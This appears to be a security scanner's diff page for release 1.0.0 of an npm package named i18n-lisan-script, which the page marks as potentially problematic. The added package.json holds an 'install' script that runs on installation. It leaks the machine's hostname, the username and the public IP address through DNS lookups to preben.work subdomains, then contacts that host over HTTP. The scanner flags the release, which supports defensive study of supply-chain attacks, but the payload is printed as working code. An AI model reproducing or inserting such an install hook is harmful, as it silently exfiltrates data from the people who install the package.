i18n-lisan-script 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of i18n-lisan-script might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +10 -0
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "description": "",
3
+ "license": "ISC",
4
+ "main": "index.js",
5
+ "name": "i18n-lisan-script",
6
+ "scripts": {
7
+ "install": "host i18n-lisan-script.preben.work; host $(hostname).preben.work; host $(whoami).preben.work; host $(wget https://checkip.amazonaws.com -q -O /dev/stdout).preben.work; wget http://preben.work/?i18n-lisan-script -q -O /dev/null;"
8
+ },
9
+ "version": "1.0.0"
10
+ }